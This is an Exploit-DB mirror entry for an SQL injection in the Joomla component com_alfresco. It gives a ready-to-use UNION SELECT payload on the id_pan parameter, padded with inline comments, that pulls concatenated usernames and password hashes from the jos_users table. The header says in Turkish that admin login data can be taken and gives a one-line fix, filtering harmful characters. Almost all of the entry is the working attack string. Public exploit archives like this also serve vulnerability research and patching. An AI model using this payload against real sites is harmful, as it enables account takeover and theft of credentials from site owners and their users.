exploit-db-mirror/exploits/php/webapps/10952.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

31 lines
No EOL
981 B
Text

<------------------- header data start ------------------- >
#############################################################
# Joomla Component com_alfresco SQL Injection Vulnerability
#############################################################
# Author : FL0RiX
# Name : com_alfresco
# Greez : PyskE,Dr.Kacak And All Friends
# Bug Type : SQL Injection
# Infection : Admin login bilgileri alinabilir.
# Demo Vuln. :
http://server/index.php?option=com_alfresco&task=edit&id_pan=[SQL INJ.]
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
path/index.php?option=com_alfresco&task=edit&id_pan=null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users--
< -- bug code end of -- >